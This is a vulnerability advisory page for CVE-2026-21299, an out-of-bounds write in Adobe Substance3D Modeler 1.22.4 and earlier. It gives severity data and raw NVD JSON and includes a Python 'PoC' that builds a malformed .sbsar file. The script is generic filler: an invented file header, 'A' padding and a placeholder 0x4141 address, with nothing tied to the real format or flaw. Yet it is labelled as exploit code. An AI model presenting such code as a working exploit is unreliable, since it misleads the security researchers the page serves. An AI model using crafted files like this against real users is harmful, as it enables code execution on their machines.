Security Vulnerability Report
CVE-2026-21299 CVSS 7.8 HIGH

CVE-2026-21299

Published: 2026-01-13 21:15:53
Last Modified: 2026-01-14 17:57:59

Description

Substance3D - Modeler versions 1.22.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:* - VULNERABLE
Adobe Substance3D Modeler <= 1.22.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-21299 PoC - Malicious Substance3D Modeler File
# This PoC creates a malformed .sbsar file that triggers out-of-bounds write
# Usage: Open the generated file in Adobe Substance3D Modeler <= 1.22.4

import struct
import os


def create_malicious_sbsar():
    """
    Generate a malicious SBSAR file to trigger CVE-2026-21299
    The file contains crafted data that causes buffer overflow during parsing
    """
    # SBSAR file header
    header = b'SBSAR'  # File signature
    header += struct.pack('<I', 1)  # Version
    header += struct.pack('<I', 0x100)  # Offset to data

    # Malicious payload that triggers OOB write
    # Long string to overflow buffer boundaries
    overflow_data = b'A' * 0x10000  # 64KB of padding

    # Crafted object properties that trigger unsafe write
    # Overwrite function pointers or vtable entries
    shellcode_addr = struct.pack('<Q', 0x4141414141414141)  # Fake address
    trigger_data = overflow_data + shellcode_addr * 100

    # File metadata with malicious values
    metadata = b'\x00' * 16  # Reserved
    metadata += struct.pack('<I', 0xFFFFFFFF)  # Malformed size field
    metadata += trigger_data

    # Combine all parts
    malicious_file = header + metadata
    return malicious_file


def main():
    output_path = 'CVE-2026-21299_poc.sbsar'
    poc_data = create_malicious_sbsar()

    with open(output_path, 'wb') as f:
        f.write(poc_data)

    print(f'[+] PoC file generated: {output_path}')
    print(f'[+] File size: {len(poc_data)} bytes')
    print('[!] Warning: This PoC is for educational/research purposes only')
    print('[!] Do not use for malicious activities')


if __name__ == '__main__':
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21299", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:53.470", "lastModified": "2026-01-14T17:57:58.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Substance3D - Modeler versiones 1.22.4 y anteriores están afectadas por una vulnerabilidad de escritura fuera de límites que podría resultar en ejecución de código arbitrario en el contexto del usuario actual. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.5", "matchCriteriaId": "D5A6870D-D2DE-4B8F-8680-3717CA179D14"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}